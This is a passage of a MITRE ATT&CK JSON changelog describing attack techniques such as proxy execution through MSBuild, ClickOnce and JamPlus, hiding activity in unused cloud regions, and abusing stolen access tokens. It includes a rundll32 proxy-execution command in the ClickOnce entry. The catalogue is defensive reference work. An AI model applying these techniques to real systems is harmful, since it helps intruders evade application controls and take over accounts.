                            "url": "https://attack.mitre.org/techniques/T1127",
                            "external_id": "T1127"
                        },
                        {
                            "source_name": "Exploit Monday WinDbg",
                            "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20160816135945/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
                        },
                        {
                            "source_name": "Elastic Security Labs",
                            "description": "Joe Desimone. (2024, August 5). Dismantling Smart App Control. Retrieved March 21, 2025.",
                            "url": "https://www.elastic.co/security-labs/dismantling-smart-app-control"
                        },
                        {
                            "source_name": "LOLBAS Tracker",
                            "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"
                        },
                        {
                            "source_name": "Microsoft Smart App Control",
                            "description": "Microsoft. (n.d.). Smart App Control Frequently Asked Questions. Retrieved April 4, 2025.",
                            "url": "https://support.microsoft.com/en-us/windows/smart-app-control-frequently-asked-questions-285ea03d-fa88-4d56-882e-6698afdb7003"
                        },
                        {
                            "source_name": "engima0x3 RCSI Bypass",
                            "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.",
                            "url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/"
                        },
                        {
                            "source_name": "engima0x3 DNX Bypass",
                            "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.",
                            "url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Casey Smith",
                        "Matthew Demaske, Adaptforward"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:45:17.637000+00:00\", \"old_value\": \"2025-10-24 17:49:40.055000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}, \"iterable_item_added\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1021: Restrict Web-Based Content",
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0172: Behavior-chain, platform-aware detection strategy for T1127 Trusted Developer Utilities Proxy Execution (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-09-09 14:39:28.637000+00:00",
                    "modified": "2026-04-15 22:45:37.624000+00:00",
                    "name": "ClickOnce",
                    "description": "Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)\n\nBecause ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.\n\nClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)\n\nAdversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)\n\nAdditionally, an adversary can move the ClickOnce application file to a remote user\u2019s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1127/002",
                            "external_id": "T1127.002"
                        },
                        {
                            "source_name": "LOLBAS /Dfsvc.exe",
                            "description": "LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"
                        },
                        {
                            "source_name": "Microsoft Learn ClickOnce",
                            "description": "Microsoft. (2023, September 14). ClickOnce security and deployment. Retrieved September 9, 2024.",
                            "url": "https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022"
                        },
                        {
                            "source_name": "SpectorOps Medium ClickOnce",
                            "description": "Nick Powers. (2023, June 7). Less SmartScreen More Caffeine: (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.",
                            "url": "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5"
                        },
                        {
                            "source_name": "NetSPI ClickOnce",
                            "description": "Ryan Gandrud. (2015, March 23). All You Need Is One \u2013 A ClickOnce Love Story. Retrieved September 9, 2024.",
                            "url": "https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/"
                        },
                        {
                            "source_name": "Burke/CISA ClickOnce Paper",
                            "description": "William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution & C2. Retrieved September 9, 2024.",
                            "url": "https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894"
                        },
                        {
                            "source_name": "Burke/CISA ClickOnce BlackHat",
                            "description": "William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU\u2019RE IN: When .appref-ms abuse is operating as intended. Retrieved September 9, 2024.",
                            "url": "https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Wirapong Petshagun"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:45:37.624000+00:00\", \"old_value\": \"2025-04-15 19:59:08.154000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}, \"iterable_item_added\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1021: Restrict Web-Based Content",
                            "M1042: Disable or Remove Feature or Program",
                            "M1045: Code Signing"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0191: Behavior-chain detection strategy for T1127.002 Trusted Developer Utilities Proxy Execution: ClickOnce (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7d356151-a69d-404e-896b-71618952702a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-21 13:36:48.710000+00:00",
                    "modified": "2026-04-15 22:45:43.373000+00:00",
                    "name": "JamPlus",
                    "description": "Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)\n\nAdversaries may abuse the `JamPlus` build utility to execute malicious scripts via a `.jam` file, which describes the build process and required dependencies. Because the malicious script is executed from a reputable developer tool, it may subvert application control security systems such as Smart App Control.(Citation: Cyble)(Citation: Elastic Security Labs)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1127/003",
                            "external_id": "T1127.003"
                        },
                        {
                            "source_name": "Cyble",
                            "description": "Cyble. (2024, September 9). Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC). Retrieved March 21, 2025.",
                            "url": "https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/"
                        },
                        {
                            "source_name": "Elastic Security Labs",
                            "description": "Joe Desimone. (2024, August 5). Dismantling Smart App Control. Retrieved March 21, 2025.",
                            "url": "https://www.elastic.co/security-labs/dismantling-smart-app-control"
                        },
                        {
                            "source_name": "JamPlus manual",
                            "description": "Perforce Software, Inc.. (n.d.). JamPlus manual: Quick Start Guide. Retrieved March 21, 2025.",
                            "url": "https://jamplus.github.io/jamplus/quick_start.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:45:43.373000+00:00\", \"old_value\": \"2025-04-17 21:42:31.066000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}, \"iterable_item_added\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0585: Behavior-chain detection strategy for T1127.003 Trusted Developer Utilities Proxy Execution: JamPlus (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-27 21:50:26.042000+00:00",
                    "modified": "2026-04-15 22:45:30.815000+00:00",
                    "name": "MSBuild",
                    "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1127/001",
                            "external_id": "T1127.001"
                        },
                        {
                            "source_name": "LOLBAS Msbuild",
                            "description": "LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"
                        },
                        {
                            "source_name": "Microsoft MSBuild Inline Tasks 2017",
                            "description": "Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.",
                            "url": "https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element"
                        },
                        {
                            "source_name": "MSDN MSBuild",
                            "description": "Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.",
                            "url": "https://msdn.microsoft.com/library/dd393574.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "@ionstorm",
                        "Carrie Roberts, @OrOneEqualsOne"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:45:30.815000+00:00\", \"old_value\": \"2025-10-24 17:49:22.881000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}, \"iterable_item_added\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0556: Behavior-chain detection strategy for T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-09-04 14:35:04.617000+00:00",
                    "modified": "2026-04-15 22:48:40.705000+00:00",
                    "name": "Unused/Unsupported Cloud Regions",
                    "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1535",
                            "external_id": "T1535"
                        },
                        {
                            "source_name": "CloudSploit - Unused AWS Regions",
                            "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.",
                            "url": "https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Netskope"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:48:40.705000+00:00\", \"old_value\": \"2025-10-24 17:48:49.853000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0247: Detection of Adversary Use of Unused or Unsupported Cloud Regions (IaaS)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 16:18:36.873000+00:00",
                    "modified": "2026-04-15 22:48:07.391000+00:00",
                    "name": "Use Alternate Authentication Material",
                    "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system\u2014either in memory or on disk\u2014it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1550",
                            "external_id": "T1550"
                        },
                        {
                            "source_name": "NIST Authentication",
                            "description": "NIST. (n.d.). Authentication. Retrieved January 30, 2020.",
                            "url": "https://csrc.nist.gov/glossary/term/authentication"
                        },
                        {
                            "source_name": "NIST MFA",
                            "description": "NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September 25, 2024.",
                            "url": "https://csrc.nist.gov/glossary/term/multi_factor_authentication"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Blake Strom, Microsoft Threat Intelligence",
                        "Pawel Partyka, Microsoft Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:48:07.391000+00:00\", \"old_value\": \"2025-10-24 17:48:46.684000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][1]\": {\"source_name\": \"TechNet Audit Policy\", \"description\": \"Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.\", \"url\": \"https://technet.microsoft.com/en-us/library/dn487457.aspx\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1015: Active Directory Configuration",
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1036: Account Use Policies",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0338: Behavioral Detection Strategy for Use Alternate Authentication Material (T1550)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 17:37:22.261000+00:00",
                    "modified": "2026-04-15 22:48:23.373000+00:00",
                    "name": "Application Access Token",
                    "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured \u2013 for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user\u2019s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1550/001",
                            "external_id": "T1550.001"
                        },
                        {
                            "source_name": "Crowdstrike AWS User Federation Persistence",
                            "description": " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.",
                            "url": "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/"
                        },
                        {
                            "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019",
                            "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.",
                            "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"
                        },
                        {
                            "source_name": "AWS Temporary Security Credentials",
                            "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.",
                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html"
                        },
                        {
                            "source_name": "Microsoft Identity Platform Access 2019",
                            "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.",
                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"
                        },
                        {
                            "source_name": "Google Cloud Service Account Credentials",
                            "description": "Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.",
                            "url": "https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials"
                        },
